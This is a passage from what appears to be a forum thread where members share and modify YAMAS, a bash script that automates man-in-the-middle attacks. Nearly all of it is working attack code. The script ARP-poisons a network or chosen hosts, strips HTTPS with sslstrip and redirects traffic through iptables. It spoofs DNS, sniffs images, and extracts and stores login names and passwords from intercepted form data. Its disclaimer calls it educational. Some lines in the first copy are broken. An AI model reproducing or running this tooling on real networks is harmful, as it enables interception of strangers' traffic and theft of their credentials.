- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
killall driftnet && killall driftnet #kill the unbeliever
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) mkdir $log_output_dir/capture_$(date +%d%m%y) && driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
drifton=1 &
echo "Driftnet launched, the images will be saved in $log_output_dir/capture_$(date +%d%m%y)"
misc ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
I'll look at the last one you posted now, but I think in the end we've done the same thing.
-
you have the capture directory like this
~
I fixed it up a different way.
I'm going to test it more thoroughly, with several sessions... let's see what happens.
-
))))), I screwed up...
I deleted the good one... the code I posted is no good. :'(
Starting over again.
Although I only need to fix the options part, which I had gotten right; why have a menu to choose an image sniffer if only driftnet works? I'm going to correct it.
-
you have the capture directory like this
~
I fixed it up a different way.
I'm going to test it more thoroughly, with several sessions... let's see what happens.
~ = user folder = in the case of wifislax, /root
If you run "mkdir ~/pepito" in the terminal, you'll see the directory /root/pepito gets created,
there's no need to touch that, not sure if I'm explaining myself xD
-
))))), I screwed up...
I deleted the good one... the code I posted is no good. :'(
Starting over again.
Although I only need to fix the options part, which I had gotten right; why have a menu to choose an image sniffer if only driftnet works? I'm going to correct it.
Don't rack your brain, the one I posted works fine; besides, I also removed that menu and set it so it starts capturing directly.
Like I said, in the end we'd done the same thing xD
-
;D ;D ;D I put the "modified by" in because we've tweaked quite a bit of the original.
[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net
if [ $UID -ne 0 ]; then
echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0 #NOTE: plain-HTTP fetch with no checksum or signature check, written over the running script and re-executed as root; use -s on any network you do not control
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP address to attack :"
read newip
if [[ "$etter" = "1" ]];then #use the same poisoner as the main attack (this previously always launched arpspoof, even with -e)
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$newip/ 2>/dev/null & sleep 2
else
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
fi
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm -f ~/hosts_spoof #-f: no error when there is no previous list
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
hostfile=$gothost
else
echo -e "We'll make one...\n"
mkhst
hostfile=~/hosts_spoof
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f "$hostfile" & dnsid=$! #previously always used ~/hosts_spoof and ignored the path entered above
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellaneous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
image_choice=1
case $image_choice in
1) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33mPausing...\033[m"
kill -STOP $looparseid #signal by name: the numbers (19/18) differ between architectures
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33mResuming...\033[m"
kill -CONT $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31mKilling...\033[m"
kill $looparseid
